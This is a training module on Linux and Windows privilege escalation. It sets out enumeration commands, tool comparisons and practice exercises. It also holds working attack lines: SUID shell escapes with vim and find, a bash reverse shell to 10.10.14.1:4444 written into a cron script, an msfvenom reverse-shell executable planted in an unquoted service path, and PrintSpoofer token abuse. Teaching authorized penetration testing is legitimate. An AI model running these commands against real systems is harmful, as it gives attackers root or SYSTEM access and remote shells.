Local Privilege Escalation¶

Module Overview

This module covers techniques and methodologies for escalating privileges on compromised systems across different operating systems.

Learning Objectives¶

By the end of this module, you will be able to:

Understand privilege escalation concepts and attack vectors
Perform Linux privilege escalation techniques
Execute Windows privilege escalation methods
Utilize automated enumeration tools
Apply manual enumeration techniques

Privilege Escalation Fundamentals¶

graph TD
    A[Initial Access] --> B[Enumeration]
    B --> C{OS Type?}
    C -->|Linux| D[Linux PrivEsc]
    C -->|Windows| E[Windows PrivEsc]
    D --> F[Automated Tools]
    E --> F
    F --> G[Manual Techniques]
    G --> H[Root/SYSTEM Access]

Key Concepts¶

Concept	Description	Impact Level
Vertical Escalation	Moving from lower to higher privilege level	High
Horizontal Escalation	Moving between accounts at same privilege level	Medium
Kernel Exploits	Exploiting OS kernel vulnerabilities	Critical
Misconfiguration	Leveraging system misconfigurations	Variable

Linux Privilege Escalation¶

System Enumeration¶

Basic CommandsProcess AnalysisFile Permissions

# System information
uname -a
cat /etc/os-release

# Current user and groups
id
groups

# Sudo permissions
sudo -l

# Running processes
ps aux | grep root

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# Services
systemctl list-units --type=service --state=running

# SUID binaries
find / -perm -4000 -type f 2>/dev/null

# World-writable files
find / -perm -002 -type f 2>/dev/null

# Files owned by current user
find / -user $(id -u) -type f 2>/dev/null

Common Attack Vectors¶

SUID Binary Exploitation¶

GTFOBins Example

# Check for vulnerable SUID binaries
find / -perm -4000 -type f 2>/dev/null | grep -E "(vim|nano|less|more)"

# Exploit vim SUID
vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Cron Job Exploitation¶

# Check for writable cron scripts
ls -la /etc/cron.d/
cat /etc/crontab

# Example exploitation
echo "bash -i >& /dev/tcp/10.10.14.1/4444 0>&1" >> /vulnerable/script.sh

Mathematical Analysis¶

The probability of successful privilege escalation can be modeled as:

\[P(success) = 1 - \prod_{i=1}^{n} (1 - p_i)\]

Where \(p_i\) represents the probability of each individual attack vector succeeding.

Windows Privilege Escalation¶

PowerShell Enumeration¶

System InformationService AnalysisRegistry Enumeration

# System details
Get-ComputerInfo
Get-WmiObject -Class Win32_OperatingSystem

# User information
whoami /all
net user $env:USERNAME

# Group memberships
net localgroup

# Services running as SYSTEM
Get-WmiObject win32_service | Select Name, StartName, PathName

# Unquoted service paths
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notlike '*"*'} | Select Name, PathName

# Service permissions
Get-Acl -Path "C:\Program Files\VulnerableApp\service.exe" | Format-List

# AutoRuns
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Always Install Elevated
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"

# Stored credentials
cmdkey /list

Attack Techniques¶

Unquoted Service Paths¶

# Identify vulnerable service
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -like "*Program Files*" -and $_.PathName -notlike '*"*'}

# Create malicious executable
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe > Program.exe

# Place in vulnerable path
copy Program.exe "C:\Program Files\Vulnerable App\Program.exe"

Token Impersonation¶

SeImpersonatePrivilege

If the current user has SeImpersonatePrivilege, tools like JuicyPotato or PrintSpoofer can be used for privilege escalation.

# Check privileges
whoami /priv

# Use PrintSpoofer
PrintSpoofer.exe -i -c cmd

Automated Tools¶

Linux Tools Comparison¶

Tool	Description	Detection Evasion	Ease of Use	Coverage
LinPEAS	Comprehensive Linux privilege escalation scanner	Medium	High	Excellent
LinEnum	Classic Linux enumeration script	Low	High	Good
LSE	Linux Smart Enumeration with color coding	Medium	High	Very Good
unix-privesc-check	Thorough UNIX privilege escalation checker	Low	Medium	Good
SUID3NUM	SUID binary exploitation helper	High	Medium	Focused
pspy	Process monitoring without root privileges	High	Medium	Specialized
BeRoot	Multi-platform privilege escalation checker	Medium	High	Good

Windows Tools Matrix¶

Tool	Technique Coverage	Ease of Use	Detection Risk
WinPEAS
PowerUp
Seatbelt
SharpUp

Practical Exercises¶

Exercise 1: Linux SUID Enumeration¶

Challenge

Enumerate and exploit SUID binaries on a target Linux system.

Solution Steps

Enumerate SUID binaries:
```
find / -perm -4000 -type f 2>/dev/null
```
Check GTFOBins for exploitation methods

Execute privilege escalation:

# Example with find
find . -exec /bin/sh -p \; -quit

Exercise 2: Windows Service Exploitation¶

Challenge

Identify and exploit an unquoted service path vulnerability.

Solution Approach

flowchart LR
    A[Enumerate Services] --> B[Identify Unquoted Paths]
    B --> C[Check Write Permissions]
    C --> D[Create Malicious Binary]
    D --> E[Restart Service]
    E --> F[Gain SYSTEM Shell]

Key Takeaways¶

Critical Points

Enumeration is key - Thorough system enumeration often reveals multiple privilege escalation vectors
Combine techniques - Use both automated tools and manual methods for comprehensive coverage
Understand the environment - Different OS versions and configurations require different approaches
Persistence matters - Consider maintaining access after successful escalation

Additional Resources¶

GTFOBins - Unix binaries exploitation database
LOLBAS - Living Off The Land Binaries for Windows
PayloadsAllTheThings - Privilege escalation payloads
HackTricks - Comprehensive pentesting methodologies

This module provides a foundation for understanding and implementing privilege escalation techniques across different operating systems and environments.